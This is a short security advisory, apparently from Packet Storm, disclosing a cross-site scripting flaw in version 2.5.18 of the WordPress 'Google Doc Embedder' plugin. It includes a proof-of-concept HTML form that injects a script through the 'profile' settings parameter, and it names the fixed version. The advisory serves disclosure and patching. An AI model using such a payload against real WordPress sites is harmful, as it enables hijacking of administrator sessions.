WordPress Google Doc Embedder plugin version 2.5.18 suffers from a cross site scripting vulnerability.
497e2ccda286e008626a60f9d575f4384dab4de0b541b70d5e96999e15ecd3c8Title: WordPress 'Google Doc Embedder' plugin - XSS
Version: 2.5.18
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/google-document-embedder/
Contacted WordPress: 2015/01/26
==========================================================
## Description:
==========================================================
Lets you embed PDF, MS Office, and many other file types in a web page using the free Google Docs Viewer (no Flash or PDF browser plug-ins required).
## XSS:
==========================================================
By tricking a logged in admin into visiting a crafted page, it is possible to perform an XSS attack through the 'profile' parameter.
PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=gde-settings">
<text>action: </text>
<input type="text" name="action" value="edit" READONLY><br />
<text>profile: </text>
<input type="text" name="profile" value=""><script>alert(1);</script>"><br />
<input type="submit">
</form>
## Solution
==========================================================
Update to version 2.5.19.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed